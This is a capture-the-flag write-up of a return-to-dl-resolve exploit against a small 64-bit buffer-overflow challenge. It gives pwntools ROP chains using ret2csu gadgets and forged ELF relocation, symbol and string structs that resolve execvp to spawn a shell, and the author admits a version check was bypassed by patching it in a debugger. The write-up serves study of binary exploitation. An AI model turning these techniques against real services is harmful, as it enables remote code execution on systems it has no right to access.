Dl Resolve Attack
Intro
During the last CTF I played I was working on a really nice challenge, which I think is worth a writeup. The challenge was called crySYS and all the materials can be find on my github.
The Challenge itself contained a simple bufferoverflow and the goal was to get a shell on the server. Even the source code was given:
#include <stdio.h>
#include <unistd.h>
//gcc -o challenge -no-pie -fno-stack-protector challenges.c
//LD_PRELOAD=./libc-2.27.so ./ld-2.27.so ./challenge
int not_vulnerable() {
char buf[80];
return read(0, buf, 0x1000);
}
int main() {
not_vulnerable();
return 0;
}
Furthermore, we see the compile command and we know there is no stack canary which means the binary is exploitable.
The Rest of this blog I will describe my two attempts of how I solved it.
Background Information
You might think, why we just dont do return2libc
? and I thought that in the first
moment as well but for a return2libc
attack you always need a leak, like in
this example the resolved address of read
, then calculate the base address
of the libc and then calculate the address of system
or exevp
or wathever.
For a return2libc
attack we would need an address leak, but in this special
case there is no function resolved which can leak anything. Only read
is
resolved. We could of course setup a write system call using a ROPchain
but
this binary is so small that there are simply not enough gadgets.
So the only attack I could come up, was return2dlresolve
. There are already
some good resources available regarding this attack:
- https://gist.github.com/ricardo2197/8c7f6f5b8950ed6771c1cd3a116f7e62
- https://www.rootnetsec.com/ropemporium-ret2csu/
- https://1ce0ear.github.io/2017/10/20/return-to-dl/
- https://ddaa.tw/hitcon_pwn_200_blinkroot.html
Tooling
For the exploit I use python
with pwntools
. I have a patched version
of pwntools
which spawns radare2
instead of gdb
by calling
gdb.attach(p, r2cmd="db {}".format(hex(offset)))
and I can pass it a
r2 startup command. (I have plans on doing a PR on pwntools about this patch.)
For the binary analysis I am using IDA 7.5, its just easy to read out all the offsets from it, but as this binary is so small every other tool will be fine too.
return-to-dl-resolve ?
This technique is pretty nice as it is independent of the used libc version and
it doesnt need a leak, all it requires is a ROPchain
and a memory location
where we can write to.
To exploit it we are going to resolve the execvp
function, we achieve this
by creating all structs needed by the dynamic linker to resolve this function,
and after it is resolved it will call it.
We need:
- forge structs: JMPREL-entry, SYMTAB-entry, STRTAB-entry ( we dont need everything excatly recreated just the bytes we need)
- write to a known address (we use bss segment)
- setup arguments for execvp call
- call dlresolve
- Hopefully having a shell at this point :)
First Attempt, simple ROP
To trigger the BO and call read again to read the forged structs we use:
chain_read = b""
chain_read += b"A"*80 # overflow padding
chain_read += b"B"*8 # fake rbp
chain_read += p64(POP_RSI_POP_R15_RET) # set read buffer
chain_read += p64(C_AREA) # ptr to controlable buffer
chain_read += b"C"*8 # dummy r15 data
chain_read += p64(MOV_EDI_CALL_READ) # call read
chain_read += b"D"*16 # note end of chain
C_AREA
is the address of the bss
segment which is 0x601030
. IDA shows
that this segment is only 8byte in size, as memory is handled in pages, we have
a whole page for our structs, which is more than enough.
The two ROPgadgets
are simply setting up the arguments, as it is a 64bit binary
the three arguments for read are in the rdi
,rsi
and rdx
registers.
This attempt can be found in exp_version_1.py
. During debugging I noticed a
problem, the read
call has this gadget:
.text:0000000000400500 E8 EB FE FF FF call _read
.text:0000000000400505 C9 leave
.text:0000000000400506 C3 retn
The leave
instruction restores the rsp
from the
rbp
and we overwrite the rbp
. Meaning we control where the ROPchain
continues. This is kind of bad, we dont want this power. Because I found no
way to set the rbp to a reasonable address on the stack, this means we loose the
rest of our ROPchain
. Of course what we can do is, set the rsp
to the bss
segment and write the rest of our ROPchain
to the bss
segment. But I
considered this as unecessary work, so I used a different approach ret2csu
.
Second Attempt, ret2csu
Instead of simply calling read
via a ROPchain
I used the ret2csu
method
to avoid loosing track of the ROPchain
.
All the gadgets needed can be found in the __libc_csu_init
function. On a
program startup this function calls all functions from the .init_array
segment. These are functions like constructors or initialization of global
variables and so on, like everything which has to be ready before the main
function is called.
The part of the function we need is:
.text:0000000000400560 4C 89 FA mov rdx, r15
.text:0000000000400563 4C 89 F6 mov rsi, r14
.text:0000000000400566 44 89 EF mov edi, r13d
.text:0000000000400569 41 FF 14 DC call [r12+rbx*8]
.text:000000000040056D 48 83 C3 01 add rbx, 1
.text:0000000000400571 48 39 DD cmp rbp, rbx
.text:0000000000400574 75 EA jnz short loc_400560
.text:0000000000400576 48 83 C4 08 add rsp, 8
.text:000000000040057A 5B pop rbx
.text:000000000040057B 5D pop rbp
.text:000000000040057C 41 5C pop r12
.text:000000000040057E 41 5D pop r13
.text:0000000000400580 41 5E pop r14
.text:0000000000400582 41 5F pop r15
.text:0000000000400584 C3 retn
But we split it into two gadgets, the first starting at 0x400560
which
contains the function call, and the second one starts at 0x40057A
, this one
we use to correctly setup the arguments needed for the call at 0x400569
.
As we see there is no leave
instructions, so nothing messes with the rsp,
except the add rsp, 8
but we can overcome this easy with padding.
The ROPchain
we will use is:
C_AREA = 0x601030
CSU_RET = 0x40057A
CSU_CALL = 0x400560
RELOC_READ = 0x601018
chain_read = b"A"*80 # overflow padding
chain_read += b"B"*8 # fake rbp
chain_read += p64(CSU_RET) # gadget
chain_read += p64(0) # RBX (to get "call [r12]")
chain_read += p64(1) # RBP (to pass cmp rbp, rbx after call)
chain_read += p64(RELOC_READ) # R12 (overwrite read GOT entry)
chain_read += p64(0) # R13 (has to be zero for stdin read)
chain_read += p64(C_AREA) # R14 (ptr to controlable buffer)
chain_read += p64(0x100) # R15 (amount we want to read)
chain_read += p64(CSU_CALL)
chain_read += b"D"*8 # to counter (add rsp,8) after the call
This will call read
and we can pass our forged structs into it. After the
read we continue and call the resolver.
Creating the Structs
This is the difficult part I think. The resovler needs these structs to correctly
resolve execvp
. This works as follow (a short description as there is plenty
of material online)
A call to read
calls into the .plt
section:
.plt:00000000004003F0 ; ssize_t read(int fd, void *buf, size_t nbytes)
.plt:00000000004003F0 FF 25 22 0C 20 00 jmp cs:off_601018
.plt:00000000004003F6 68 00 00 00 00 push 0
.plt:00000000004003FB E9 E0 FF FF FF jmp resolver_4003E0
The jmp
at address 4003F0
jumps to the address stored at this location
in the GOT
. If read
is already resolved it jumps directly to its implementation.
If not, it jumps back to 4003F6
, pushes the zero on the stack which is the
relocation argument. Defining at which offset in the JMPREL Relocation Table
the read
entry can be found. In this case it is zero meaning that read
is
the first entry.
Verifing this in IDA (skipping the bytes):
LOAD:00000000004003B0 ; ELF JMPREL Relocation Table
LOAD:00000000004003B0 Elf64_Rela <601018h, 100000007h, 0> ; R_X86_64_JUMP_SLOT read
Yes thats the case. The value in the JMPRELentry
are the address on where to
store the resolved address, the rel_info
which defines the type of relocation
and the offset in the symbol table. The index is calculated by shifting rel_info
32 bits to the right, so in this case its 100000007h >> 32 = 1
. So its
the second entry in the symbol table.
Verifing this in IDA (skipping the bytes):
LOAD:00000000004002B8 ; ELF Symbol Table
LOAD:00000000004002B8 Elf64_Sym <0>
LOAD:00000000004002D0 Elf64_Sym <0Bh, 12h, 0, 0, 0, 0> ; "read"
LOAD:00000000004002E8 Elf64_Sym <10h, 12h, 0, 0, 0, 0> ; "__libc_start_main"
LOAD:0000000000400300 Elf64_Sym <2Eh, 20h, 0, 0, 0, 0> ; "__gmon_start__"
Yes looks good, the first entry is always zero by the way. The first entry here
points to the offset in the string table. So the read
string starts at offset
11 in the STRTAB
.
Verifing this in IDA (skipping the bytes):
LOAD:0000000000400318 ; ELF String Table
LOAD:0000000000400318 byte_400318 db 0
LOAD:0000000000400319 aLibcSo6 db 'libc.so.6',0
LOAD:0000000000400323 aRead db 'read',0
LOAD:0000000000400328 aLibcStartMain db '__libc_start_main',0
LOAD:000000000040033A aGlibc225 db 'GLIBC_2.2.5',0
LOAD:0000000000400346 aGmonStart db '__gmon_start__',0
0x23-0x18 = 11
and thats also matching. Nothing more is needed. We need
to push the correct offset on the stack before calling the resolver. This
offset has to point to the bss
segment where our forged JMPRELentry
lies.
This entry has to contain valid parameters for the GOT
offset, we reuse the
one from read, and the rel_info
. Where rel_info
also has to point to the
bss
segment to our forged symbol table entry. And last, in the symbol table
entry we need a valid pointer to the execvp
offset in the string table.
This all is calculated as follows:
FORGED_AREA = C_AREA + 0x20 # space for sh\x00 string
# calculate relocation offset
rel_offset = int((FORGED_AREA - JMPREL)/24) # must be divideable with 0 rest
elf64_sym_struct = FORGED_AREA + 0x28 # sym struct offset
index_sym = int((elf64_sym_struct - SYMTAB)/24) # calculate symbol table offset
r_info = (index_sym << 32) | 0x7 # 7 -> plt relocation type
elf64_jmprel_struct = p64(bin_elf.got['read']) # just reuse read offset
elf64_jmprel_struct += p64(r_info)
elf64_jmprel_struct += p64(0)
elf64_jmprel_struct += b"P"*16 # padd to size 40 for second 24 division
st_name = (elf64_sym_struct + 0x20) - STRTAB # offset to "execvp"
elf64_sym_struct = p64(st_name) + p64(0x12) + p64(0) + p64(0)
# putting structs together
chain_structs = b"sh\x00" # bin sh string as argument to resolver
chain_structs += p64(0) # for execvp argv pointer
chain_structs += b"P"*21 # padding
chain_structs += elf64_jmprel_struct # forged jmprel entry struct
chain_structs += elf64_sym_struct # forged symbol table struct
chain_structs += b"execvp\x00" # function to resolve
chain_structs += b"X"*17 # end of forged struct
It’s important to note that all addresses have to be 24byte aligned, as those entries are 24bytes in size.
Final Stage
Now that we have all the pieces. The last step is to call the resolver and
trigger the resolving of excevp
. This is done using a simple ROPchain
:
chain_read += p64(POP_RDI) # set execvp file arg
chain_read += p64(C_AREA) # sh string
chain_read += p64(POP_RSI_POP_R15_RET) # empty args str
chain_read += p64(C_AREA+2) # null ptr arg to execvp
chain_read += b"R"*8 # dummy r15
chain_read += p64(RESOLVER_ADDR) # call resolver
chain_read += p64(rel_offset) # reloc_index arg
chain_read += b"E"*16 # end of chain
Of course before calling the resolver we have to setup the arguments for execvp, as the resolver calls it after successful resolving.
The resolver works in two steps, first _dl_runtime_resolve
(source)
is called which saves all the register on the stack and prepares the call to
_dl_fixup
(source).
This function access the entries of our forged structs and calls _dl_lookup_symbol_x
which is then resolving our function.
Calling the completed exploit exp_version_3.py
returns a shell.
Final Notes
This technique was really nice to exploit, and it’s a bit advanced I would say.
The thing which did not work until the end was, that in _dl_fixup
there exists
this version check:
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
{
const ElfW(Half) *vernum = (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0)
version = NULL;
}
I patched this to be NULL manually in the debugger. I leave this as an exercise
to the reader on how to pass this check. Because if it is not avoided the
exploit will die in a SEGFAULT on this vernum[ELFW(R_SYM) (reloc->r_info)]
derefrenciation.